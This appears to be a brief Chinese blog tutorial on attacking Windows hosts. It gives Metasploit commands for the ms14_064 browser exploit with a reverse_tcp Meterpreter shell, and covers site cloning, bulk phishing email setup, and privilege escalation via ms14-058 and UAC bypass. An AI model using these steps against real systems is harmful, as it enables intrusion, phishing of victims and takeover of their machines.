接上篇
接上篇:https://blog.csdn.net/qq_41158271/article/details/130865765?spm=1001.2014.3001.5501
Cobalt Strike与Metasploit溢出代码攻击
- 启动msf模块
use exploit/windows/browser/ms14_064_ole_code_execution
show options
set SRVHOST 192.168.0.107
set SRVPORT 8888
set payload windows/meterpreter/reverse_tcp
exploit
msf具体使用查看链接:https://blog.csdn.net/qq_41158271/article/details/130362377?spm=1001.2014.3001.5501
- 克隆网址
- 复制生成的连接
http://192.168.0.107:8080/msf
- 受害者运行生成的链接
受害人成功连接
邮箱钓鱼
准备批量邮箱模板
准备内容模板
mail服务器设置
权限提升
ms14-058提权
- 执行命令
bypassuac
绕过uac
- 使用ms14-058配置提权
3. 提权成功
powershell提权
自行查找